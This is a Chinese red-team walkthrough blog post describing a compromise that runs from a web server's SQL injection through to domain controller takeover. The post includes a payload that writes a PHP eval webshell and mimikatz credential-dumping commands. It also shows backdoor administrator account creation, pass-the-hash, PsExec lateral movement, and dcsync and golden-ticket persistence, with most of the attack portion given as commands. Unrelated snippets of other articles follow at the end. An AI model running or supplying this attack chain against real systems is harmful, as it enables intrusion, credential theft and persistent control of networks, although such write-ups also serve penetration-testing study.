红队攻防实战之从边界突破到漫游内网(无cs和msf)

也许有一天我们再相逢,睁大眼睛看清楚,我才是英雄。

本文首发于先知社区,原创作者即是本人

本篇文章目录

在这里插入图片描述

网络拓扑图:

本次红队攻防实战所需绘制的拓扑图如下:

在这里插入图片描述

边界突破

访问网站:

http://xxx.xxx.xxx/?id=1

首页如下:

在这里插入图片描述

SQL注入拿shell

构造payload:and 1=1显示正确,and 1=2显示错误,说明存在SQL注入,并且爆出绝对路径

在这里插入图片描述

使用常用的注入函数into outfile 将一句话木马写入自动创建的 xxx.php文件中

http://xxx.xxx.xxx/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[xxx]);?>' into outfile 'x:\\xxx\\xxx\\xxx.php'

需要有写入权限和上一步爆出的绝对路径

在这里插入图片描述

验证上传的木马是否成功,成功写入木马

http://xxx.xxx.xxx/xxx.php?xxx=phpinfo();

在这里插入图片描述

成功利用蚁剑拿到shell

在这里插入图片描述

内网信息收集

whoami
发现是普通用户的权限

在这里插入图片描述

ipconfig /all
查看用户的IP信息,可以看到位于工作组环境

在这里插入图片描述

route print
查看路由,通往10.0.1网段

在这里插入图片描述

net config Workstation
查看计算机名、全名、用户名、系统版本、工作站

在这里插入图片描述

利用蚁剑传入Potato提权工具,并使用其虚拟终端,查看权限,提权。
将超时时间调大:

在这里插入图片描述

上传Potato提权工具成功,改名为xxx.exe

在这里插入图片描述

使用命令可以看到成功提权
xxx.exe -p “whoami”

在这里插入图片描述

将mimikatz改名为x.exe,成功上传

在这里插入图片描述

然后在终端执行

xxx.exe -p "x.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt"

在这里插入图片描述

查看log.txt,成功抓到当前用户和另一用户的密码

在这里插入图片描述

在这里插入图片描述

netstat -ano查看是否开启3389端口,发现已开启

在这里插入图片描述

查看防火墙是开启的
netsh firewall show state

在这里插入图片描述

reGeorg内网穿透

使用软件reGeorg实现攻击机与目标机器的通信
通过蚁剑将reGeorge中的tunnel.php上传至网站改名为tu.php

在这里插入图片描述

并成功访问

http://xx.xx.xx/tu.php

在这里插入图片描述

启动reGeorg

python3 xx.py -k xxx -u http://xx.xx.xx/tu.php

表示本地1080端口的流量都转发给指定的那个url,1080是指定的监听端口;

在这里插入图片描述

代理可以使用:

在这里插入图片描述

内网渗透

拿下边界服务器

挂上代理远程连接10.0.1.4

在这里插入图片描述

创建新账号admin 并提权

xx.exe -p "net user xxx xxxx /add" //新增账号和对应密码
xx.exe -p "net localgroup administrators xxxx /add"//提升新增账号的权限至administrators组

在这里插入图片描述

远程连接

在这里插入图片描述

成功连接

在这里插入图片描述

将mimikatz添加到桌面并以管理员权限运行
privilege::debug 提升权限
log 日志会记录内容
sekurlsa::logonpasswords 抓取密码

在这里插入图片描述

成功抓到管理员账户密码:
使用上述管理员账号密码,成功登陆服务器

在这里插入图片描述

通过nbtscan对当前C端进行扫描,发现还有三台机器存活

在这里插入图片描述

拿下域内主机

根据我这个攻防时长两年半的个人练习生的经验来判断,内网里的服务器的账号密码有部分可能是相同的。
再使用上述管理员账号密码远程连接10.0.1.8

在这里插入图片描述

成功连接

在这里插入图片描述

whoami查看是administrator权限
ipconfig /all查看有域xx.xx

在这里插入图片描述

一般DNS服务器就是域控服务器

在这里插入图片描述

查询域控主机名,遭拒绝,需利用官方工具将账号提升至system权限再查
net user /domain

在这里插入图片描述

上传官方工具PsExec.exe提权
PsExec.exe -i -s -d cmd 提升至system权限,获取主机名DC.xx.xx

在这里插入图片描述

尝试访问域控主机C盘
dir \DC.xx.xx\c$

在这里插入图片描述

是拒绝的,需要工具minikatz,使用哈希传递

拿下域控

将mimikatz添加到桌面并以管理员权限运行
privilege::debug 提升权限
log 日志会记录内容
sekurlsa::logonpasswords 抓取密码

在这里插入图片描述

获取

user=administrator
Domain=xxx
NTLM=xxxxxxx

将上述值放入下方命令中,完成哈希传递,以后利用这个CMD窗口运行,拥有管理员权限。

sekurlsa::pth /user:administrator /domain:"xx.xx"
/ntlm:xxxxxxx

启动域控主机cmd窗口,成功访问域控主机C盘
dir \DC.xx.xx\c$

在这里插入图片描述

使用官方工具PsExec.exe,命令如下:
PsExec.exe \dc.xx.xx cmd
进入c:
输入ipconfig, 10.0.1.6为域控ip,此时成功获取域控cmd

在这里插入图片描述

新建账号,直接远程登陆域控主机

"net user xxx xxxx /add" //新增账号和对应密码
"net localgroup administrators xxxx /add"//提升新增账号的权限至administrators组

在这里插入图片描述

建好账号后,直接登陆域控主机10.0.1.6(DC.xx.xx),成功拿下域控主机权限

在这里插入图片描述

至此已成功拿下三台主机的权限。

在这里插入图片描述

权限维持

可通过制作黄金票据进行权限维持
因为域控主机10.0.1.6安装了补丁KB2871997,所以无法抓取到明文密码
管理员运行猕猴桃
log 日志记录内容
lsadump::dcsync /user:krbtgt 获取内容

在这里插入图片描述

获取krbtgt账号的关键值(OSID和Hash_NTLM)

在这里插入图片描述

制作黄金票据

kerberos::golden /admin:administrator /domain:xx.xx /sid:xx-xx-xx /krbtgt:xxxxxx /ticket:xxx.kiribi

如图

在这里插入图片描述

票据加载成功

在这里插入图片描述

普通窗口无法访问域控根目录

在这里插入图片描述

把域控中的票据复制到在10.0.1.8主机中,使用猕猴桃加载票据
kerberos::ptt xxx.kiribi 加载票据

在这里插入图片描述

然后成功在普通cmd中访问域控c盘内容
dir \DC.xx.xx\c$

在这里插入图片描述

PExec.exe \DC.xx.xx cmd 获取域控cmd

在这里插入图片描述

网络安全感悟

做网络安全是一个长期的过程,因为做网络安全没有终点,不管是网络安全企业,还是在网络安全行业各种不同方向的从业人员,不管你选择哪个方向,只有在这条路上坚持不懈,才能在这条路上走的更远,走的更好,不然你肯定走不远,迟早会转行或者被淘汰,把时间全浪费掉。如果你觉得自己是真的热爱网络安全这个行业,坚持走下去就可以了,不用去管别人,现在就是一个大浪淘金的时代,淘下去的是沙子,留下来的才是金子,正所谓,千淘万漉虽辛苦,吹尽狂沙始到金,网络安全的路还很长,一生只做一件事,坚持做好一件事!

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:各家兴 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

CSDN:
https://blog.csdn.net/weixin_48899364?type=blog

公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

博客:
https://rdyx0.github.io/

先知社区:
https://xz.aliyun.com/u/37846

SecIN:
https://www.sec-in.com/author/3097

FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/185478.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Flink 常用物理分区算子(Physical Partitioning)

Flink 物理分区算子(Physical Partitioning) 在Flink中&#xff0c;常见的物理分区策略有&#xff1a;随机分配(Random)、轮询分配(Round-Robin)、重缩放(Rescale)和广播(Broadcast)。 接下来&#xff0c;我们通过源码和Demo分别了解每种物理分区算子的作用和区别。 (1) 随机…

2024北京林业大学计算机考研分析

24计算机考研|上岸指南 北京林业大学 特色优势 Characteristics & Advantages&#xff1a;信息学院创建于2001年&#xff0c;是一个年轻而有朝气的学院。学院秉承“结构、特色、质量、创新”的八字方针&#xff0c;坚持以“质量提升、行业融合”为核心的内涵式发展战略&am…

Pycharm创建项目新环境,安装Pytorch

在python项目中&#xff0c;很多项目使用的各类包的版本是不一致的。所以我们可以对每个项目有专属于它的环境。所以这个文章就是教你如何创建新环境。 一、创建新环境 首先我们需要去官网下载conda。然后在Pycharm下面添加conda的可执行文件。 用conda创建新环境。 二、…

libmosquitto库的一个bug,任务消息id(mid)分配后不起作用

代码如图所示: 当订阅了所有主题后,每个主题的mid是他们的下标索引加100的数字,可是实际打印出来的值是: mid依然是1,2,这个参数在这里失效了,不知道是bug还是mqtt的什么机制?

Python之Pygame游戏编程详解

一、介绍 1.1 定义 Pygame是一种流行的Python游戏开发库&#xff0c;它提供了许多功能&#xff0c;使开发人员可以轻松创建2D游戏。它具有良好的跨平台支持&#xff0c;可以在多个操作系统上运行&#xff0c;例如Windows&#xff0c;MacOS和Linux。在本文中&#xff0c;我们将…

Linux后台运行Python的py文件,如何使ssh工具退出后仍能运行

常规运行 python3 mysqlbak.py ssh工具退出后&#xff0c;或ctrlc中断后&#xff0c;程序将不在运行 后台运行 nohup python3 mysqlbak.py > mysqlbak.log & > mysqlbak.log为可选项&#xff0c;输出日志到指定文件&#xff0c;如果不写&#xff0c;输出日志到nohup…

【Seata源码学习 】篇四 TM事务管理器是如何开启全局事务

TM发送 单个或批量 消息 以发送GlobalBeginRequest消息为例 TM在执行拦截器链路前将向TC发送GlobalBeginRequest 消息 io.seata.tm.api.DefaultGlobalTransaction#begin(int, java.lang.String) Overridepublic String begin(String applicationId, String transactionServi…

网络安全工程师究竟是什么?怎么入门?

首先啊骚年们我们必须先了解网络安全这个行业究竟是干啥的。 是打ctf的&#xff1f;一个个都像韩商言吴白那么帅刷刷敲几个代码就能轻易夺旗&#xff1f; 还是像十大黑客之一的米特尼克一样闯入了“北美空中防务指挥系统”的计算机主机内&#xff0c;还在被通缉逃跑期间控制了…

鸿蒙原生应用/元服务开发-AGC分发如何上架HarmonyOS应用

一、上架整体流程 二、上架HarmonyOS应用 获取到HarmonyOS应用软件包后&#xff0c;开发者可将应用提交至AGC申请上架。上架成功后&#xff0c;用户即可在华为应用市场搜索获取开发者的HarmonyOS应用。 配置应用信息 1.登录AppGallery Connect&#xff0c;选择“我的应用”。…

最重要的BI测试-适用于任何BI和分析平台

为什么 BI 测试是答案 相信你的数据可视化是成功执行商业智能 (BI) 和分析项目的关键因素。我敢肯定&#xff0c;你遇到过以下情况&#xff1a;业务主管或业务用户反馈说他们的分析看起来不对&#xff0c;他们的 KPI 看起来有问题&#xff0c;或者速度太慢而无法使用。要问自己…

Spring框架学习 -- Bean的生命周期和作用域

目录 前言 案例 案例分析 作用域的定义 Bean对象的6种作用域 Singleton prototype 设置作用域 ​编辑延迟初始化 Spring的执行流程 Bean的生命周期 前言 我们可以类比一下普通变量的生命周期和作用域, 大多数变量的生命周期和作用域都被限定在了花括号内 {}, 除…

贝锐花生壳:无需公网IP、简单3步,远程访问群晖NAS

面对NAS远程访问难题&#xff0c;贝锐花生壳一招搞定&#xff01;并且无需公网IP、简单3步&#xff0c;即可实现固定域名远程访问NAS。 步骤1&#xff1a; 目前&#xff0c;群晖NAS已在套件中心内置花生壳客户端。 浏览器进入群晖NAS的DSM管理界面&#xff0c;点击【套件中心】…

SSM大学生社团信息管理系统-99953,(免费领取源码)计算机毕业设计选题开题+程序定制+论文书写+答辩ppt书写 包售后 全流程

SSM大学生社团信息管理系统APP 摘 要 随着科学技术的飞速发展&#xff0c;社会的方方面面、各行各业都在努力与现代的先进技术接轨&#xff0c;通过科技手段来提高自身的优势&#xff0c;高校当然也不能排除在外。大学生社团信息管理系统APP是以实际运用为开发背景&#xff0c…

[Python程序打包: 使用PyInstaller制作单文件exe以及打包GUI程序详解]

文章目录 概要Python 程序打包—使用 Pyinstaller 打包 exePython程序打包—使用Pyinstaller打包GUI程序Python程序打包—使用 Pyinstaller 设置 exe 图标小结 概要 使用PyInstaller工具将Python程序打包成可执行&#xff08;EXE&#xff09;文件。将Python程序打包成EXE的好处…

unittest指南——不拼花哨,只拼实用

&#x1f4e2;专注于分享软件测试干货内容&#xff0c;欢迎点赞 &#x1f44d; 收藏 ⭐留言 &#x1f4dd; 如有错误敬请指正&#xff01;&#x1f4e2;交流讨论&#xff1a;欢迎加入我们一起学习&#xff01;&#x1f4e2;资源分享&#xff1a;耗时200小时精选的「软件测试」资…

看完就会,从抓包到接口测试的全过程解析【1500字保姆级教程】

一、为什么抓包 1、从功能测试角度 通过抓包查看隐藏字段 Web 表单中会有很多隐藏的字段&#xff0c;这些隐藏字段一般都有一些特殊的用途&#xff0c;比如收集用户的数据&#xff0c;预防 CRSF 攻击&#xff0c;防网络爬虫&#xff0c;以及一些其他用途。这些隐藏字段在界面…

从裸机启动开始运行一个C++程序(十四)

前序文章请看&#xff1a; 从裸机启动开始运行一个C程序&#xff08;十三&#xff09; 从裸机启动开始运行一个C程序&#xff08;十二&#xff09; 从裸机启动开始运行一个C程序&#xff08;十一&#xff09; 从裸机启动开始运行一个C程序&#xff08;十&#xff09; 从裸机启动…

socket can中是如何根据 结构体can_bittiming_const中的字段 计算bitrate的?

在 SocketCAN 中&#xff0c;can_bittiming_const 结构体用于表示 CAN 总线的定时参数&#xff0c;包括位率&#xff08;bitrate&#xff09;的计算。can_bittiming_const 包含了许多与位率相关的参数&#xff0c;其中一些参数用于计算实际的位率。 下面是一些与位率计算相关的…

js实现数组的上下移动

思路&#xff1a;上移表示index索引位置减去1&#xff0c;下移表示index索引位置增加1。使用数组的splice方法实现。例如上移&#xff1a;splice(元素当前索引位置&#xff0c;1(删除1个元素)&#xff0c;‘元素当前索引位置 - 1’)。

ruoyi 若依框架采用第三方登录

在项目中&#xff0c;前后端分离的若依项目&#xff0c;需要通过统一认证&#xff0c;或者是第三方协带认证信息跳转到本系统的指定页面。需要前后端都做相应的改造&#xff0c;由于第一次实现时已过了很久&#xff0c;再次重写时&#xff0c;发现还是搞了很长时间&#xff0c;…